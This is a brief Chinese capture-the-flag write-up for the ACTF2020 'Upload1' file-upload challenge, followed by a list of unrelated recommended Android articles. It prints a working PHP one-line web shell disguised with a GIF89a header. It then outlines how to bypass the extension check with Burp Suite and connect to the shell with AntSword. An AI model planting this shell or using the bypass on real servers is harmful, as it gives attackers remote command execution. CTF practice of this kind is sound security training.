1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
砖厂小工6 小时前
用 GLM + OpenClaw 打造你的 AI PR Review Agent — 让龙虾帮你审代码张拭心7 小时前
春节后,有些公司明确要求 AI 经验了张拭心7 小时前
Android 17 来了!新特性介绍与适配建议Kapaseker9 小时前
Compose 进阶—巧用 GraphicsLayer黄林晴10 小时前
Android17 为什么重写 MessageQueue阿巴斯甜1 天前
Android 报错:Zip file '/Users/lyy/develop/repoAndroidLapp/l-app-android-ble/app/buKapaseker1 天前
实战 Compose 中的 IntrinsicSizexq95271 天前
Andorid Google 登录接入文档黄林晴1 天前
告别 Modifier 地狱,Compose 样式系统要变天了冬奇Lab2 天前
Android触摸事件分发、手势识别与输入优化实战